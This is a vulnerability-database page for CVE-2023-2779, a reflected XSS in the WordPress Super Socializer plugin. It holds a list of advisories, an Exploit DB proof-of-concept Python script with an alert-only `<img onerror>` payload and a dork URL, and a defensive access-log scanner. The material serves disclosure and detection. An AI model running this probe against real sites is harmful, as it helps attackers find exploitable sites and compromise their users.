Super Socializer 7.13.52 - Reflected XSS Exploit detected in WordPress plugin
| Reporter | Title | Published | Views | Family |
|---|---|---|---|---|
| Packet Storm | WordPress Super Socializer 7.13.52 Cross Site Scripting | 21 Jun 2023 00:00 | – | packetstorm |
| Exploit DB | Super Socializer 7.13.52 - Reflected XSS | 20 Jun 2023 00:00 | – | exploitdb |
| CVE | CVE-2023-2779 | 19 Jun 2023 11:15 | – | cve |
| NVD | CVE-2023-2779 | 19 Jun 2023 11:15 | – | nvd |
| Cvelist | CVE-2023-2779 Super Socializer < 7.13.52 - Reflected XSS | 19 Jun 2023 10:52 | – | cvelist |
| Patchstack | WordPress Super Socializer Plugin < 7.13.52 is vulnerable to Cross Site Scripting (XSS) | 19 Jun 2023 00:00 | – | patchstack |
| Vulnrichment | CVE-2023-2779 Super Socializer < 7.13.52 - Reflected XSS | 19 Jun 2023 10:52 | – | vulnrichment |
| Nuclei | Super Socializer < 7.13.52 - Cross-Site Scripting | 17 Oct 2023 07:20 | – | nuclei |
| Prion | Cross site scripting | 19 Jun 2023 11:15 | – | prion |
| Wordfence Blog | Wordfence Intelligence Weekly WordPress Vulnerability Report (May 29, 2023 to June 4, 2023) | 8 Jun 2023 13:39 | – | wordfence |
```python
# Exploit Title: Super Socializer 7.13.52 - Reflected XSS
# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/super-socializer
# Version: 7.13.52 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-2779
import requests

# The URL of the vulnerable AJAX endpoint
url = "https://example.com/wp-admin/admin-ajax.php"
# The vulnerable parameter that is not properly sanitized and escaped
vulnerable_param = "<img src=x onerror=alert(document.domain)>"
# The payload that exploits the vulnerability: the marker is placed in the key
# of the urls[] array, which the plugin reflects in its response
payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}
# Send a POST request to the vulnerable endpoint with the payload
response = requests.post(url, data=payload)
# Check whether the injected marker is reflected unescaped in the response body
if vulnerable_param in response.text:
    print("Vulnerability successfully exploited")
else:
    print("Vulnerability not exploitable")
```
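A defender-side check for the request pattern above, added here as an example that is not part of the Exploit DB entry or the plugin: it scans web-server access-log lines for calls to the `the_champ_sharing_count` action whose `urls[...]` array keys carry markup characters. The log lines are constructed samples, and because a POST body never reaches an access log this catches only the GET form shown in the dork; the POST variant needs WAF or request-body logging.

```python
# Added example, not part of the Exploit DB entry or the plugin: flag access-log
# entries that call the Super Socializer sharing-count action with markup in a
# urls[...] array key, the reflection point described by CVE-2023-2779.
import re
from urllib.parse import parse_qsl, urlsplit

ACTION = "the_champ_sharing_count"
# A "<", ">" or quote in a key that should hold a URL reflects markup if the
# response echoes the key unescaped.
MARKUP = re.compile(r"[<>\"']")
KEY = re.compile(r"^urls\[(.*)\]$", re.DOTALL)
# Common/combined log format: ip ident user [time] "METHOD target PROTO" status
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Constructed sample lines: the dork from the exploit header against an example
# host, a benign sharing-count call, and unrelated traffic with "<" elsewhere.
LOG_LINES = [
    '203.0.113.7 - - [20/Jun/2023:10:15:01 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert'
    '%28document%2Edomain%29%3E]=https://www.google.com HTTP/1.1" 200 512',
    '198.51.100.4 - - [20/Jun/2023:10:15:02 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=the_champ_sharing_count&urls[https://example.com/p/1]=https://example.com/p/1 HTTP/1.1" 200 128',
    '198.51.100.9 - - [20/Jun/2023:10:15:03 +0000] "GET /index.php?s=%3Cimg%3E HTTP/1.1" 200 4096',
]

def suspicious_keys(target: str) -> list:
    """Return the decoded urls[...] keys of a request target that contain markup."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return []
    params = parse_qsl(parts.query, keep_blank_values=True)  # percent-decodes keys too
    if ("action", ACTION) not in params:
        return []
    hits = []
    for key, _value in params:
        m = KEY.match(key)
        if m and MARKUP.search(m.group(1)):
            hits.append(m.group(1))
    return hits

def scan_log(lines):
    """Yield (ip, target, offending keys) for each logged request that matches."""
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            keys = suspicious_keys(m["target"])
            if keys:
                yield m["ip"], m["target"], keys
```

Feed `scan_log` real access-log lines to get the source IP and the offending key for each hit; a patched plugin (7.13.52 or later) still sees these requests, so the matches are useful as an attempt signal rather than as proof of compromise.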